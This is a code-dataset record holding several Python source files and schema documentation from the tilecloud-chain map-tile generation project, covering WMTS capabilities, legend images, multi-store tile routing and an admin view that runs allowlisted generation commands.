300. Default: `300`.\n - **`max_retries`** _(integer)_: The max retries (main configuration), default is 5. Default: `5`.\n - **`max_errors_age`** _(integer)_: The max error age (main configuration), default is 86400 (1 day). Default: `86400`.\n - **`max_errors_nb`** _(integer)_: The max error number (main configuration), default is 100. Default: `100`.\n - **`prefix`** _(string)_: The prefix (main configuration), default is 'tilecloud_cache'. Default: `\"tilecloud_cache\"`.\n - **`expiration`** _(integer)_: The meta-tile in queue expiration (main configuration), default is 28800 (8 hours). Default: `28800`.\n - **`pending_count`** _(integer)_: The pending count: the number of pending tiles get in one request (main configuration), default is 10. Default: `10`.\n - **`pending_max_count`** _(integer)_: The pending max count: the maximum number of pending tiles get in one pass (if not generating other tiles, every second) (main configuration), default is 10000. Default: `10000`.\n- <a id=\"definitions/server\"></a>**`server`** _(object)_: Configuration used by the tile server, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#distribute-the-tiles. Cannot contain additional properties.\n - **`cache`** _(string)_: The used cache name.\n - **`layers`** _(array)_: Layers available in the server, default is all layers.\n - **Items** _(string)_\n - **`geoms_redirect`** _(boolean)_: Take care on the geometries, default is False. Default: `false`.\n - **`static_allow_extension`** _(array)_: The allowed extension of static files, defaults to [jpeg, png, xml, js, html, css].\n - **Items** _(string)_\n - **`wmts_path`** _(string)_: The sub-path for the WMTS (main configuration), default is 'wmts'. Default: `\"wmts\"`.\n - **`static_path`** _(string)_: The sub-path for the static files (main configuration), default is 'static'. Default: `\"static\"`.\n - **`admin_path`** _(string)_: The sub-path for the admin (main configuration), default is 'admin'. Default: `\"admin\"`.\n - **`expires`** _(integer)_: The browser cache expiration, default is 8 (hours). Default: `8`.\n - **`predefined_commands`** _(array)_: The predefined commands used to generate the tiles.\n - **Items** _(object)_: Cannot contain additional properties.\n - **`command`** _(string)_: The command to run.\n - **`name`** _(string)_: The name used in the admin interface.\n - **`allowed_commands`** _(array)_: The allowed commands (main configuration).\n - **Items** _(string)_\n - **`allowed_arguments`** _(array)_: The allowed arguments (main configuration).\n - **Items** _(string)_\n- <a id=\"definitions/cost\"></a>**`cost`** _(object)_: The configuration use to calculate the cast (unmaintained). Cannot contain additional properties.\n - **`request_per_layers`** _(integer)_: Tile request per hours, default is 10 000 000. Default: `10000000`.\n - **`s3`** _(object)_: The S3 cost (main configuration). Cannot contain additional properties.\n - **`storage`** _(number)_: The storage cost in $ / Gio / month (main configuration). Default: `0.125`.\n - **`put`** _(number)_: The cost of put in $ per 10 000 requests (main configuration). Default: `0.01`.\n - **`get`** _(number)_: The cost of get in $ per 10 000 requests (main configuration). Default: `0.01`.\n - **`download`** _(number)_: The cost of download in $ per Gio (main configuration). Default: `0.12`.\n - **`cloudfront`** _(object)_: The CloudFront cost (main configuration). Cannot contain additional properties.\n - **`get`** _(number)_: The cost of get in $ per 10 000 requests (main configuration). Default: `0.009`.\n - **`download`** _(number)_: The cost of download in $ per Gio (main configuration). Default: `0.12`.\n - **`sqs`** _(object)_: The SQS cost, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-sqs (main configuration). Cannot contain additional properties.\n - **`request`** _(number)_: The cost of request in $ per 1 000 000 requests (main configuration). Default: `0.01`.\n- <a id=\"definitions/metadata\"></a>**`metadata`** _(object)_: The configuration of the WMTS capabilities metadata. Cannot contain additional properties.\n - **`title`** _(string, required)_: The title.\n - **`abstract`** _(string)_: The abstract.\n - **`servicetype`** _(string)_: The service type, default is 'OGC WMTS'. Default: `\"OGC WMTS\"`.\n - **`keywords`** _(array)_: The keywords.\n - **Items** _(string)_\n - **`fees`** _(string)_: The fees.\n - **`access_constraints`** _(string)_: The access constraints.\n- <a id=\"definitions/provider\"></a>**`provider`** _(object)_: The provider. Cannot contain additional properties.\n - **`name`** _(string)_\n - **`url`** _(string)_: The public URL.\n - **`contact`** _(object)_: The contact. Cannot contain additional properties.\n - **`name`** _(string)_\n - **`position`** _(string)_\n - **`info`** _(object)_: The information. Cannot contain additional properties.\n - **`phone`** _(object)_: The phone. Cannot contain additional properties.\n - **`voice`** _(string)_: The voice number.\n - **`fax`** _(string)_: The fax number.\n - **`address`** _(object)_: The address. Cannot contain additional properties.\n - **`delivery`** _(string)_: The delivery.\n - **`city`** _(string)_: The city.\n - **`area`** _(string)_: The area.\n - **`postal_code`** _(integer)_: The postal code.\n - **`country`** _(string)_: The country.\n - **`email`** _(string)_: The email.\n- <a id=\"definitions/logging\"></a>**`logging`** _(object)_: The logging configuration to database, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#logging (main configuration). Cannot contain additional properties.\n - **`database`** _(object, required)_: The database (main configuration). Cannot contain additional properties.\n - **`host`** _(string)_: The host (main configuration).\n - **`port`** _(integer)_: The port (main configuration), default is 5432. Default: `5432`.\n - **`dbname`** _(string, required)_: The database name (main configuration).\n - **`table`** _(string, required)_: The table name (main configuration).\n - **`user`** _(string, required)_: The user name (main configuration).\n - **`password`** _(string, required)_: The password (main configuration).\n" }, { "alpha_fraction": 0.5295293927192688, "alphanum_fraction": 0.533341646194458, "avg_line_length": 38.6064338684082, "blob_id": "bf992f2bfebe8b740ba0f9bc00641879e3971040", "content_id": "7a610e139f2fa62a0324852db71ba68748b40e8e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16001, "license_type": "permissive", "max_line_length": 110, "num_lines": 404, "path": "/tilecloud_chain/controller.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import logging\nimport math\nimport os\nimport pkgutil\nimport sys\nfrom argparse import ArgumentParser\nfrom copy import copy\nfrom hashlib import sha1\nfrom io import BytesIO, StringIO\nfrom math import exp, log\nfrom typing import IO, List, Literal, Optional, Union, cast\nfrom urllib.parse import urlencode, urljoin\n\nimport botocore.exceptions\nimport requests\nimport ruamel.yaml\nfrom azure.core.exceptions import ResourceNotFoundError\nfrom azure.identity import DefaultAzureCredential\nfrom azure.storage.blob import BlobServiceClient, ContentSettings\nfrom bottle import jinja2_template\nfrom PIL import Image\nfrom prometheus_client import Summary\n\nimport tilecloud.store.redis\nimport tilecloud.store.s3\nimport tilecloud_chain.configuration\nfrom tilecloud.lib.PIL_ import FORMAT_BY_CONTENT_TYPE\nfrom tilecloud_chain import (\n DatedConfig,\n TileGeneration,\n add_common_options,\n get_queue_store,\n get_tile_matrix_identifier,\n)\n\n_LOGGER = logging.getLogger(__name__)\n_GET_STATUS_SUMMARY = Summary(\"tilecloud_chain_get_status\", \"Number of get_stats\", [\"type\", \"queue\"])\n\n\ndef main(args: Optional[List[str]] = None, out: Optional[IO[str]] = None) -> None:\n \"\"\"Generate the contextual file like the legends.\"\"\"\n\n del out\n\n try:\n parser = ArgumentParser(\n description=\"Used to generate the contextual file like the capabilities, the legends, \"\n \"the OpenLayers example\",\n prog=args[0] if args else sys.argv[0],\n )\n add_common_options(parser, tile_pyramid=False, no_geom=False, default_config_file=True)\n parser.add_argument(\n \"--status\", default=False, action=\"store_true\", help=\"Display the SQS queue status and exit\"\n )\n parser.add_argument(\n \"--legends\",\n \"--generate-legend-images\",\n default=False,\n action=\"store_true\",\n dest=\"legends\",\n help=\"Generate the legend images\",\n )\n parser.add_argument(\n \"--dump-config\",\n default=False,\n action=\"store_true\",\n help=\"Dump the used config with default values and exit\",\n )\n\n options = parser.parse_args(args[1:] if args else sys.argv[1:])\n gene = TileGeneration(options.config, options, layer_name=options.layer)\n assert gene.config_file\n config = gene.get_config(gene.config_file)\n\n if options.status:\n status(gene)\n sys.exit(0)\n\n if options.cache is None:\n options.cache = config.config[\"generation\"][\"default_cache\"]\n\n if options.dump_config:\n _validate_generate_wmts_capabilities(config.config[\"caches\"][options.cache], options.cache, True)\n yaml = ruamel.yaml.YAML()\n yaml_out = StringIO()\n yaml.dump(config.config, yaml_out)\n print(yaml_out.getvalue())\n sys.exit(0)\n\n if options.legends:\n _generate_legend_images(gene)\n\n except SystemExit:\n raise\n except: # pylint: disable=bare-except\n _LOGGER.exception(\"Exit with exception\")\n if os.environ.get(\"TESTS\", \"false\").lower() == \"true\":\n raise\n sys.exit(1)\n\n\ndef get_azure_client() -> BlobServiceClient:\n \"\"\"Get the Azure blog storage client.\"\"\"\n if \"AZURE_STORAGE_CONNECTION_STRING\" in os.environ and os.environ[\"AZURE_STORAGE_CONNECTION_STRING\"]:\n return BlobServiceClient.from_connection_string(os.environ[\"AZURE_STORAGE_CONNECTION_STRING\"])\n else:\n return BlobServiceClient(\n account_url=os.environ[\"AZURE_STORAGE_ACCOUNT_URL\"],\n credential=DefaultAzureCredential(),\n )\n\n\ndef _send(\n data: Union[bytes, str], path: str, mime_type: str, cache: tilecloud_chain.configuration.Cache\n) -> None:\n if cache[\"type\"] == \"s3\":\n cache_s3 = cast(tilecloud_chain.configuration.CacheS3, cache)\n client = tilecloud.store.s3.get_client(cache_s3.get(\"host\"))\n key_name = os.path.join(f\"{cache['folder']}\", path)\n bucket = cache_s3[\"bucket\"]\n client.put_object(\n ACL=\"public-read\",\n Body=data,\n Key=key_name,\n Bucket=bucket,\n ContentEncoding=\"utf-8\",\n ContentType=mime_type,\n )\n if cache[\"type\"] == \"azure\":\n cache_azure = cast(tilecloud_chain.configuration.CacheAzure, cache)\n key_name = os.path.join(f\"{cache['folder']}\", path)\n blob = get_azure_client().get_blob_client(container=cache_azure[\"container\"], blob=key_name)\n blob.upload_blob(data, overwrite=True)\n\n blob.upload_blob(\n data,\n overwrite=True,\n content_settings=ContentSettings( # type: ignore\n content_type=mime_type,\n content_encoding=\"utf-8\",\n cache_control=cache_azure[\"cache_control\"],\n ),\n )\n else:\n if isinstance(data, str):\n data = data.encode(\"utf-8\")\n\n folder = cache[\"folder\"] or \"\"\n filename = os.path.join(folder, path)\n directory = os.path.dirname(filename)\n if not os.path.exists(directory):\n os.makedirs(directory)\n with open(filename, \"wb\") as f:\n f.write(data)\n\n\ndef _get(path: str, cache: tilecloud_chain.configuration.Cache) -> Optional[bytes]:\n if cache[\"type\"] == \"s3\":\n cache_s3 = cast(tilecloud_chain.configuration.CacheS3, cache)\n client = tilecloud.store.s3.get_client(cache_s3.get(\"host\"))\n key_name = os.path.join(f\"{cache['folder']}\".format(), path)\n bucket = cache_s3[\"bucket\"]\n try:\n response = client.get_object(Bucket=bucket, Key=key_name)\n return cast(bytes, response[\"Body\"].read())\n except botocore.exceptions.ClientError as ex:\n if ex.response[\"Error\"][\"Code\"] == \"NoSuchKey\":\n return None\n else:\n raise\n if cache[\"type\"] == \"azure\":\n cache_azure = cast(tilecloud_chain.configuration.CacheAzure, cache)\n key_name = os.path.join(f\"{cache['folder']}\", path)\n try:\n blob = get_azure_client().get_blob_client(container=cache_azure[\"container\"], blob=key_name)\n return blob.download_blob().readall()\n except ResourceNotFoundError:\n return None\n else:\n cache_filesystem = cast(tilecloud_chain.configuration.CacheFilesystem, cache)\n p = os.path.join(cache_filesystem[\"folder\"], path)\n if not os.path.isfile(p):\n return None\n with open(p, \"rb\") as file:\n return file.read()\n\n\ndef _validate_generate_wmts_capabilities(\n cache: tilecloud_chain.configuration.Cache, cache_name: str, exit_: bool\n) -> bool:\n if \"http_url\" not in cache and \"http_urls\" not in cache:\n _LOGGER.error(\n \"The attribute 'http_url' or 'http_urls' is required in the object cache[%s].\", cache_name\n )\n if exit_:\n sys.exit(1)\n return False\n return True\n\n\ndef get_wmts_capabilities(\n gene: TileGeneration, cache_name: str, exit_: bool = False, config: Optional[DatedConfig] = None\n) -> Optional[str]:\n \"\"\"Get the WMTS capabilities for a configuration file.\"\"\"\n\n if config is None:\n assert gene.config_file\n config = gene.get_config(gene.config_file)\n\n cache = config.config[\"caches\"][cache_name]\n if _validate_generate_wmts_capabilities(cache, cache_name, exit_):\n server = gene.get_main_config().config.get(\"server\")\n\n base_urls = _get_base_urls(cache)\n _fill_legend(gene, cache, server, base_urls, config=config)\n\n data = pkgutil.get_data(\"tilecloud_chain\", \"wmts_get_capabilities.jinja\")\n assert data\n return cast(\n str,\n jinja2_template(\n data.decode(\"utf-8\"),\n layers=config.config[\"layers\"],\n layer_legends=gene.layer_legends,\n grids=config.config[\"grids\"],\n getcapabilities=urljoin( # type: ignore\n base_urls[0],\n (\n server.get(\"wmts_path\", \"wmts\") + \"/1.0.0/WMTSCapabilities.xml\"\n if server is not None\n else cache.get(\"wmtscapabilities_file\", \"1.0.0/WMTSCapabilities.xml\")\n ),\n ),\n base_urls=base_urls,\n base_url_postfix=(server.get(\"wmts_path\", \"wmts\") + \"/\") if server is not None else \"\",\n get_tile_matrix_identifier=get_tile_matrix_identifier,\n server=server is not None,\n has_metadata=\"metadata\" in config.config,\n metadata=config.config.get(\"metadata\"),\n has_provider=\"provider\" in config.config,\n provider=config.config.get(\"provider\"),\n enumerate=enumerate,\n ceil=math.ceil,\n int=int,\n sorted=sorted,\n ),\n )\n return None\n\n\ndef _get_base_urls(cache: tilecloud_chain.configuration.Cache) -> List[str]:\n base_urls = []\n if \"http_url\" in cache:\n if \"hosts\" in cache:\n cc = copy(cache)\n for host in cache[\"hosts\"]:\n cc[\"host\"] = host # type: ignore\n base_urls.append(cache[\"http_url\"] % cc)\n else:\n base_urls = [cache[\"http_url\"] % cache]\n if \"http_urls\" in cache:\n base_urls = [url % cache for url in cache[\"http_urls\"]]\n base_urls = [url + \"/\" if url[-1] != \"/\" else url for url in base_urls]\n return base_urls\n\n\ndef _fill_legend(\n gene: TileGeneration,\n cache: tilecloud_chain.configuration.Cache,\n server: Optional[tilecloud_chain.configuration.Server],\n base_urls: List[str],\n config: Optional[DatedConfig] = None,\n) -> None:\n if config is None:\n assert gene.config_file\n config = gene.get_config(gene.config_file)\n\n for layer_name, layer in config.config[\"layers\"].items():\n previous_legend: Optional[tilecloud_chain.Legend] = None\n previous_resolution = None\n if \"legend_mime\" in layer and \"legend_extension\" in layer and layer_name not in gene.layer_legends:\n gene.layer_legends[layer_name] = []\n legends = gene.layer_legends[layer_name]\n for zoom, resolution in enumerate(config.config[\"grids\"][layer[\"grid\"]][\"resolutions\"]):\n path = \"/\".join(\n [\n \"1.0.0\",\n layer_name,\n layer[\"wmts_style\"],\n f\"legend{zoom}.{layer['legend_extension']}\",\n ]\n )\n img = _get(path, cache)\n if img is not None:\n new_legend: tilecloud_chain.Legend = {\n \"mime_type\": layer[\"legend_mime\"],\n \"href\": os.path.join(\n base_urls[0], server.get(\"static_path\", \"static\") + \"/\" if server else \"\", path\n ),\n }\n legends.append(new_legend)\n if previous_legend is not None:\n assert previous_resolution is not None\n middle_res = exp((log(previous_resolution) + log(resolution)) / 2)\n previous_legend[\"min_resolution\"] = middle_res\n new_legend[\"max_resolution\"] = middle_res\n try:\n pil_img = Image.open(BytesIO(img))\n new_legend[\"width\"] = pil_img.size[0]\n new_legend[\"height\"] = pil_img.size[1]\n except Exception: # pragma: nocover\n _LOGGER.warning(\n \"Unable to read legend image '%s', with '%s'\",\n path,\n repr(img),\n exc_info=True,\n )\n previous_legend = new_legend\n previous_resolution = resolution\n\n\ndef _generate_legend_images(gene: TileGeneration) -> None:\n assert gene.config_file\n config = gene.get_config(gene.config_file)\n cache = config.config[\"caches\"][gene.options.cache]\n\n for layer_name, layer in config.config[\"layers\"].items():\n if \"legend_mime\" in layer and \"legend_extension\" in layer:\n if layer[\"type\"] == \"wms\":\n session = requests.session()\n session.headers.update(layer[\"headers\"])\n previous_hash = None\n for zoom, resolution in enumerate(config.config[\"grids\"][layer[\"grid\"]][\"resolutions\"]):\n legends = []\n for wmslayer in layer[\"layers\"].split(\",\"):\n response = session.get(\n layer[\"url\"]\n + \"?\"\n + urlencode(\n {\n \"SERVICE\": \"WMS\",\n \"VERSION\": layer.get(\"version\", \"1.0.0\"),\n \"REQUEST\": \"GetLegendGraphic\",\n \"LAYER\": wmslayer,\n \"FORMAT\": layer[\"legend_mime\"],\n \"TRANSPARENT\": \"TRUE\" if layer[\"legend_mime\"] == \"image/png\" else \"FALSE\",\n \"STYLE\": layer[\"wmts_style\"],\n \"SCALE\": resolution / 0.00028,\n }\n )\n )\n try:\n legends.append(Image.open(BytesIO(response.content)))\n except Exception: # pragma: nocover\n _LOGGER.warning(\n \"Unable to read legend image for layer '%s'-'%s', resolution '%s': %s\",\n layer_name,\n wmslayer,\n resolution,\n response.content,\n exc_info=True,\n )\n width = max(i.size[0] for i in legends)\n height = sum(i.size[1] for i in legends)\n image = Image.new(\"RGBA\", (width, height))\n y = 0\n for i in legends:\n image.paste(i, (0, y))\n y += i.size[1]\n string_io = BytesIO()\n image.save(string_io, FORMAT_BY_CONTENT_TYPE[layer[\"legend_mime\"]])\n result = string_io.getvalue()\n new_hash = sha1(result).hexdigest() # nosec\n if new_hash != previous_hash:\n previous_hash = new_hash\n _send(\n result,\n f\"1.0.0/{layer_name}/{layer['wmts_style']}/\"\n f\"legend{zoom}.{layer['legend_extension']}\",\n layer[\"legend_mime\"],\n cache,\n )\n\n\ndef _get_resource(resource: str) -> bytes:\n path = os.path.join(os.path.dirname(__file__), resource)\n with open(path, \"rb\") as f:\n return f.read()\n\n\ndef status(gene: TileGeneration) -> None:\n \"\"\"Print th tilegeneration status.\"\"\"\n print(\"\\n\".join(get_status(gene)))\n\n\ndef get_status(gene: TileGeneration) -> List[str]:\n \"\"\"Get the tile generation status.\"\"\"\n config = gene.get_main_config()\n store = get_queue_store(config, False)\n type_: Union[Literal[\"redis\"], Literal[\"sqs\"]] = \"redis\" if \"redis\" in config.config else \"sqs\"\n conf = config.config[type_]\n with _GET_STATUS_SUMMARY.labels(type_, conf[\"queue\"]).time():\n status_ = store.get_status()\n return [name + \": \" + str(value) for name, value in status_.items()]\n" }, { "alpha_fraction": 0.5863965749740601, "alphanum_fraction": 0.5863965749740601, "avg_line_length": 31.778688430786133, "blob_id": "fb25eebf1e32357821b708d5ffe81d11efcd375c", "content_id": "aaeaa9d075f40ed1c704f6edbde1921eadd1146a", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3999, "license_type": "permissive", "max_line_length": 91, "num_lines": 122, "path": "/tilecloud_chain/multitilestore.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import logging\nfrom itertools import chain, groupby, starmap\nfrom typing import Callable, Dict, Iterable, Iterator, Optional, Tuple\n\nfrom tilecloud import Tile, TileStore\n\nlogger = logging.getLogger(__name__)\n\n\nclass MultiTileStore(TileStore):\n \"\"\"Redirect to the corresponding Tilestore for the layer and config file.\"\"\"\n\n def __init__(self, get_store: Callable[[str, str], Optional[TileStore]]) -> None:\n \"\"\"Initialize.\"\"\"\n TileStore.__init__(self)\n self.get_store = get_store\n self.stores: Dict[Tuple[str, str], Optional[TileStore]] = {}\n\n def _get_store(self, config_file: str, layer: str) -> Optional[TileStore]:\n store = self.stores.get((config_file, layer))\n if store is None:\n store = self.get_store(config_file, layer)\n self.stores[(config_file, layer)] = store\n return store\n\n def __contains__(self, tile: Tile) -> bool:\n \"\"\"\n Return true if this store contains ``tile``.\n\n Arguments:\n\n tile: Tile\n \"\"\"\n layer = tile.metadata[\"layer\"]\n config_file = tile.metadata[\"config_file\"]\n store = self._get_store(config_file, layer)\n assert store is not None\n return tile in store\n\n def delete_one(self, tile: Tile) -> Tile:\n \"\"\"\n Delete ``tile`` and return ``tile``.\n\n Arguments:\n\n tile: Tile\n \"\"\"\n layer = tile.metadata[\"layer\"]\n config_file = tile.metadata[\"config_file\"]\n store = self._get_store(config_file, layer)\n assert store is not None\n return store.delete_one(tile)\n\n def list(self) -> Iterator[Tile]:\n \"\"\"Generate all the tiles in the store, but without their data.\"\"\"\n # Too dangerous to list all tiles in all stores. Return an empty iterator instead\n while False:\n yield\n\n def put_one(self, tile: Tile) -> Tile:\n \"\"\"\n Store ``tile`` in the store.\n\n Arguments:\n\n tile: Tile\n \"\"\"\n layer = tile.metadata[\"layer\"]\n config_file = tile.metadata[\"config_file\"]\n store = self._get_store(config_file, layer)\n assert store is not None\n return store.put_one(tile)\n\n def get_one(self, tile: Tile) -> Optional[Tile]:\n \"\"\"\n Add data to ``tile``, or return ``None`` if ``tile`` is not in the store.\n\n Arguments:\n\n tile: Tile\n \"\"\"\n layer = tile.metadata[\"layer\"]\n config_file = tile.metadata[\"config_file\"]\n store = self._get_store(config_file, layer)\n assert store is not None\n return store.get_one(tile)\n\n def get(self, tiles: Iterable[Optional[Tile]]) -> Iterator[Optional[Tile]]:\n \"\"\"See in superclass.\"\"\"\n\n def apply(key: Tuple[str, str], tiles: Iterator[Tile]) -> Iterable[Optional[Tile]]:\n store = self._get_store(*key)\n if store is None:\n return tiles\n return store.get(tiles)\n\n return chain.from_iterable(starmap(apply, groupby(tiles, self._get_layer)))\n\n def put(self, tiles: Iterable[Tile]) -> Iterator[Tile]:\n \"\"\"See in superclass.\"\"\"\n\n def apply(key: Tuple[str, str], tiles: Iterator[Tile]) -> Iterator[Tile]:\n store = self._get_store(*key)\n assert store is not None\n return store.put(tiles)\n\n return chain.from_iterable(starmap(apply, groupby(tiles, self._get_layer)))\n\n def delete(self, tiles: Iterable[Tile]) -> Iterator[Tile]:\n \"\"\"See in superclass.\"\"\"\n\n def apply(key: Tuple[str, str], tiles: Iterator[Tile]) -> Iterator[Tile]:\n store = self._get_store(*key)\n assert store is not None\n return store.delete(tiles)\n\n return chain.from_iterable(starmap(apply, groupby(tiles, self._get_layer)))\n\n @staticmethod\n def _get_layer(tile: Optional[Tile]) -> Tuple[str, str]:\n assert tile is not None\n return (tile.metadata[\"config_file\"], tile.metadata[\"layer\"])\n" }, { "alpha_fraction": 0.5462481379508972, "alphanum_fraction": 0.5501090884208679, "avg_line_length": 37.06389617919922, "blob_id": "11e859632158dca84bc5d5a8ffac2c9c1373e117", "content_id": "d08a858654fe1f6955c63362cc1107734a8b3475", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11914, "license_type": "permissive", "max_line_length": 113, "num_lines": 313, "path": "/tilecloud_chain/views/admin.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "# Copyright (c) 2018-2023 by Camptocamp\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# 3. Neither the name of Camptocamp nor the names of its contributors may\n# be used to endorse or promote products derived from this software\n# without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\nimport io\nimport json\nimport logging\nimport multiprocessing\nimport os\nimport re\nimport shlex\nimport subprocess # nosec\nfrom typing import IO, Any, Callable, Dict, List\nfrom urllib.parse import urljoin\n\nimport pyramid.httpexceptions\nimport pyramid.request\nimport pyramid.response\nfrom c2cwsgiutils.auth import AuthenticationType, auth_type, auth_view\nfrom pyramid.view import view_config\n\nimport tilecloud_chain.server\nfrom tilecloud_chain import controller, generate\nfrom tilecloud_chain.controller import get_status\n\n_LOG = logging.getLogger(__name__)\n\n\nclass Admin:\n \"\"\"The admin views.\"\"\"\n\n def __init__(self, request: pyramid.request.Request):\n \"\"\"Initialize.\"\"\"\n self.request = request\n\n tilecloud_chain.server.init_tilegeneration(\n self.request.registry.settings[\"tilegeneration_configfile\"]\n )\n self.gene = tilecloud_chain.server.tilegeneration\n\n @view_config(route_name=\"admin\", renderer=\"tilecloud_chain:templates/admin_index.html\") # type: ignore\n @view_config(route_name=\"admin_slash\", renderer=\"tilecloud_chain:templates/admin_index.html\") # type: ignore\n def index(self) -> Dict[str, Any]:\n \"\"\"Get the admin index page.\"\"\"\n assert self.gene\n config = self.gene.get_host_config(self.request.host)\n server_config = config.config.get(\"server\", {})\n main_config = self.gene.get_main_config()\n main_server_config = main_config.config.get(\"server\", {})\n return {\n \"auth_type\": auth_type(self.request.registry.settings),\n \"has_access\": self.request.has_permission(\"admin\", config.config.get(\"authentication\", {})),\n \"commands\": server_config.get(\"predefined_commands\", []),\n \"status\": get_status(self.gene),\n \"admin_path\": main_server_config.get(\"admin_path\", \"admin\"),\n \"AuthenticationType\": AuthenticationType,\n }\n\n @view_config(route_name=\"admin_run\", renderer=\"fast_json\") # type: ignore\n def run(self) -> pyramid.response.Response:\n \"\"\"Run the command given by the user.\"\"\"\n assert self.gene\n auth_view(self.request)\n\n if \"command\" not in self.request.POST:\n self.request.response.status_code = 400\n return {\"error\": \"The POST argument 'command' is required\"}\n\n commands = shlex.split(self.request.POST[\"command\"])\n command = commands[0].replace(\"_\", \"-\")\n\n allowed_commands = (\n self.gene.get_main_config()\n .config.get(\"server\", {})\n .get(\"allowed_commands\", [\"generate-tiles\", \"generate-controller\", \"generate-cost\"])\n )\n if command not in allowed_commands:\n return {\n \"error\": f\"The given command '{command}' is not allowed, allowed command are: \"\n f\"{', '.join(allowed_commands)}\"\n }\n add_role = False\n arguments = {c.split(\"=\")[0]: c.split(\"=\")[1:] for c in commands[1:]}\n if command == \"generate-tiles\":\n add_role = \"--get-hash\" not in arguments and \"--get-bbox\" not in arguments\n\n allowed_arguments = (\n self.gene.get_main_config()\n .config.get(\"server\", {})\n .get(\n \"allowed_arguments\",\n [\n \"--layer\",\n \"--get-hash\",\n \"--generate-legend-images\",\n \"--dump-config\",\n \"--get-bbox\",\n \"--help\",\n \"--ignore-errors\",\n \"--bbox\",\n \"--zoom\",\n \"--test\",\n \"--near\",\n \"--time\",\n \"--measure-generation-time\",\n \"--no-geom\",\n \"--dimensions\",\n \"--quiet\",\n \"--verbose\",\n \"--debug\",\n \"--get-hash\",\n \"--get-bbox\",\n ],\n )\n )\n for arg in arguments.keys():\n if arg.startswith(\"-\") and arg not in allowed_arguments:\n self.request.response.status_code = 400\n return {\n \"error\": (\n f\"The argument {arg} is not allowed, allowed arguments are: \"\n f\"{', '.join(allowed_arguments)}\"\n )\n }\n\n final_command = [\n command,\n f\"--host={self.request.host}\",\n f\"--config={self.gene.get_host_config_file(self.request.host)}\",\n ]\n if add_role:\n final_command += [\"--role=master\"]\n final_command += commands[1:]\n\n display_command = shlex.join(final_command)\n _LOG.info(\"Run the command `%s`\", display_command)\n env: Dict[str, str] = {}\n env.update(os.environ)\n env[\"FRONTEND\"] = \"noninteractive\"\n\n main = None\n if final_command[0] in [\"generate-tiles\", \"generate_tiles\"]:\n main = generate.main\n elif final_command[0] in [\"generate-controller\", \"generate_controller\"]:\n main = controller.main\n if main is not None:\n return_dict: Dict[str, Any] = {}\n proc = multiprocessing.Process(\n target=_run_in_process, args=(final_command, env, main, return_dict)\n )\n proc.start()\n proc.join()\n return return_dict\n\n completed_process = subprocess.run( # nosec # pylint: disable=subprocess-run-check\n final_command,\n capture_output=True,\n env=env,\n )\n\n if completed_process.returncode != 0:\n _LOG.warning(\n \"The command `%s` exited with an error code: %s\\nstdout:\\n%s\\nstderr:\\n%s\",\n display_command,\n completed_process.returncode,\n completed_process.stdout.decode(),\n completed_process.stderr.decode(),\n )\n\n stdout_parsed = _parse_stdout(completed_process.stdout.decode())\n out = _format_output(\n \"<br />\".join(stdout_parsed),\n int(os.environ.get(\"TILECLOUD_CHAIN_MAX_OUTPUT_LENGTH\", 1000)),\n )\n if completed_process.stderr:\n out += \"<br />Error:<br />\" + _format_output(\n completed_process.stderr.decode().replace(\"\\n\", \"<br />\"),\n int(os.environ.get(\"TILECLOUD_CHAIN_MAX_OUTPUT_LENGTH\", 1000)),\n )\n return {\n \"out\": out,\n \"error\": completed_process.returncode != 0,\n }\n\n @view_config(route_name=\"admin_test\", renderer=\"tilecloud_chain:templates/openlayers.html\") # type: ignore\n def admin_test(self) -> Dict[str, Any]:\n assert self.gene\n config = self.gene.get_host_config(self.request.host)\n main_config = self.gene.get_main_config()\n return {\n \"proj4js_def\": re.sub(\n r\"\\s+\",\n \" \",\n config.config[\"openlayers\"][\"proj4js_def\"],\n ),\n \"srs\": config.config[\"openlayers\"][\"srs\"],\n \"center_x\": config.config[\"openlayers\"][\"center_x\"],\n \"center_y\": config.config[\"openlayers\"][\"center_y\"],\n \"zoom\": config.config[\"openlayers\"][\"zoom\"],\n \"http_url\": urljoin(\n self.request.current_route_url(),\n \"/\" + main_config.config[\"server\"].get(\"wmts_path\", \"wmts\") + \"/\"\n if \"server\" in config.config\n else \"/\",\n ),\n }\n\n\ndef _parse_stdout(stdout: str) -> List[str]:\n stdout_parsed = []\n for line in stdout.splitlines():\n try:\n json_message = json.loads(line)\n msg = json_message[\"msg\"]\n if 